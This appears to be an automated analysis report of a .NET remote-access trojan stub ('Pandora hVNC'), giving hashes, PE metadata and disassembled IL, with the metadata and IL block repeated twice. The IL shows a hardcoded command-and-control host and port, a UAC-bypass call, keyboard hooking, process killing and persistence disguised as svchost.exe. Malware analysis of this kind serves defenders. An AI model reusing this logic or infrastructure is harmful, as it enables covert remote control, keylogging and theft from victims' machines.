Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 72898c00ec1b93056e8876be3b1fd68f
|
| Sha1 | f3b67795a2f3d34fe4a2f831781ed49c4d7efc13
|
| Sha256 | fb7e10845d0ebac00b55f38a29e141c689a33cae3719eefb26fbb572b39aa3a4
|
| Sha384 | 6acfc13851c4708349b79777b0ba445f948b19f47d999dc1a046bd4667aa2a3419a19c3890156db16688485d4a905c4d
|
| Sha512 | 60df1078d07670f40b2bd4c8e2ebcb0efa1b1c491ec5f78d86432c1de4b6665c655b7168d8265c6f2431932172c2b20cb9bc86303077cdb954f85a24b8c706b0
|
| SSDeep | 3072:KbzoH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPtxO8Y:Kbzoe0ODhTEPgnjuIJzo+PPcfPt88
|
| TLSH | 6BF36D243AFA5029F173AF7A5FE47596CA2FB7733B07A85D205003864B23A81DDD153A
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Stub.exe |
| Full Name | Stub.exe |
| EntryPoint | System.Void Stub.Program::Main(System.String[]) |
| Scope Name | Stub.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Stub |
| Assembly Version | 3.6.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.5.2 |
| Total Strings | 141 |
| Main Method | System.Void Stub.Program::Main(System.String[]) |
| Main IL Instruction Count | 211 |
| Main IL | call System.IntPtr Stub.Program::GetConsoleWindow() ldc.i4.0 <null> call System.Boolean Stub.Program::ShowWindow(System.IntPtr,System.Int32) pop <null> ldstr 107.150.0.155 call System.Void Stub.Program::set_IP_DNS(System.String) ldstr 1337 call System.Void Stub.Program::set_PORT(System.String) ldstr svchost call System.Void Stub.Program::set_ID(System.String) ldstr lXFUFPDQa call System.Void Stub.Program::set_MUTEX(System.String) ldstr False stloc.0 <null> ldstr 0 stloc.1 <null> ldstr Services stloc.2 <null> ldstr svchost.exe stloc.3 <null> ldstr False stloc.s V_4 ldstr True stloc.s V_5 ldstr True stloc.s V_6 ldstr False stloc.s V_7 ldloc.s V_7 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_007B: ldloc.s V_6 call System.Void Stub.Program::UACxploit() ldloc.s V_6 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00AE: ldloc.s V_5 ldsfld Stub.Program/LowLevelKeyboardProc Stub.Program::_proc call System.IntPtr Stub.Program::SetHook(Stub.Program/LowLevelKeyboardProc) stsfld System.IntPtr Stub.Program::_hookID ldsfld System.String Stub.Program::ologgerPath call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00AE: ldloc.s V_5 ldsfld System.String Stub.Program::ologgerPath call System.Void System.IO.File::Delete(System.String) ldloc.s V_5 ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_01CF: ldloc.s V_5 ldstr Do You Want To Install Pandora hVNC? 
ldstr Pandora hVNC ldc.i4.4 <null> ldc.i4.s 32 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) stloc.s V_8 ldloc.s V_8 ldc.i4.6 <null> bne.un IL_01A9: ldloc.s V_8 ldstr cvtres call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_012A: call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br IL_02A3: ldloc.s V_6 call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_015F: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.String System.Diagnostics.Process::get_ProcessName() ldstr cvtres call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0159: ldloc.s V_10 ldloc.s V_11 callvirt System.Void System.Diagnostics.Process::Kill() br.s IL_0167: call System.String Stub.Program::get_IP_DNS() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0136: ldloc.s V_9 call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String 
System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br IL_02A3: ldloc.s V_6 ldloc.s V_8 ldc.i4.7 <null> bne.un IL_02A3: ldloc.s V_6 ldstr Pandora WILL NOT be installed to your system ldstr Pandora hVNC ldc.i4.0 <null> ldc.i4.s 48 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) br IL_02A3: ldloc.s V_6 ldloc.s V_5 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldstr cvtres call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_022C: call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br.s IL_02A3: ldloc.s V_6 call 
System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_0261: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_12 ldloc.s V_12 callvirt System.String System.Diagnostics.Process::get_ProcessName() ldstr cvtres call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_025B: ldloc.s V_10 ldloc.s V_12 callvirt System.Void System.Diagnostics.Process::Kill() br.s IL_0269: call System.String Stub.Program::get_IP_DNS() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0238: ldloc.s V_9 call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) ldloc.s V_6 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_02B6: ldloc.s V_7 call System.Void System.Windows.Forms.Application::Run() ldloc.s V_7 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) pop <null> ret <null> |
| Module Name | Stub.exe |
| Full Name | Stub.exe |
| EntryPoint | System.Void Stub.Program::Main(System.String[]) |
| Scope Name | Stub.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Stub |
| Assembly Version | 3.6.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.5.2 |
| Total Strings | 141 |
| Main Method | System.Void Stub.Program::Main(System.String[]) |
| Main IL Instruction Count | 211 |
| Main IL | call System.IntPtr Stub.Program::GetConsoleWindow() ldc.i4.0 <null> call System.Boolean Stub.Program::ShowWindow(System.IntPtr,System.Int32) pop <null> ldstr 107.150.0.155 call System.Void Stub.Program::set_IP_DNS(System.String) ldstr 1337 call System.Void Stub.Program::set_PORT(System.String) ldstr svchost call System.Void Stub.Program::set_ID(System.String) ldstr lXFUFPDQa call System.Void Stub.Program::set_MUTEX(System.String) ldstr False stloc.0 <null> ldstr 0 stloc.1 <null> ldstr Services stloc.2 <null> ldstr svchost.exe stloc.3 <null> ldstr False stloc.s V_4 ldstr True stloc.s V_5 ldstr True stloc.s V_6 ldstr False stloc.s V_7 ldloc.s V_7 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_007B: ldloc.s V_6 call System.Void Stub.Program::UACxploit() ldloc.s V_6 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00AE: ldloc.s V_5 ldsfld Stub.Program/LowLevelKeyboardProc Stub.Program::_proc call System.IntPtr Stub.Program::SetHook(Stub.Program/LowLevelKeyboardProc) stsfld System.IntPtr Stub.Program::_hookID ldsfld System.String Stub.Program::ologgerPath call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00AE: ldloc.s V_5 ldsfld System.String Stub.Program::ologgerPath call System.Void System.IO.File::Delete(System.String) ldloc.s V_5 ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_01CF: ldloc.s V_5 ldstr Do You Want To Install Pandora hVNC? 
ldstr Pandora hVNC ldc.i4.4 <null> ldc.i4.s 32 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) stloc.s V_8 ldloc.s V_8 ldc.i4.6 <null> bne.un IL_01A9: ldloc.s V_8 ldstr cvtres call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_012A: call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br IL_02A3: ldloc.s V_6 call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_015F: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.String System.Diagnostics.Process::get_ProcessName() ldstr cvtres call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0159: ldloc.s V_10 ldloc.s V_11 callvirt System.Void System.Diagnostics.Process::Kill() br.s IL_0167: call System.String Stub.Program::get_IP_DNS() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0136: ldloc.s V_9 call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String 
System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br IL_02A3: ldloc.s V_6 ldloc.s V_8 ldc.i4.7 <null> bne.un IL_02A3: ldloc.s V_6 ldstr Pandora WILL NOT be installed to your system ldstr Pandora hVNC ldc.i4.0 <null> ldc.i4.s 48 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) br IL_02A3: ldloc.s V_6 ldloc.s V_5 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldstr cvtres call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_022C: call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br.s IL_02A3: ldloc.s V_6 call 
System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_0261: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_12 ldloc.s V_12 callvirt System.String System.Diagnostics.Process::get_ProcessName() ldstr cvtres call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_025B: ldloc.s V_10 ldloc.s V_12 callvirt System.Void System.Diagnostics.Process::Kill() br.s IL_0269: call System.String Stub.Program::get_IP_DNS() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0238: ldloc.s V_9 call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) ldloc.s V_6 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_02B6: ldloc.s V_7 call System.Void System.Windows.Forms.Application::Run() ldloc.s V_7 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) pop <null> ret <null> |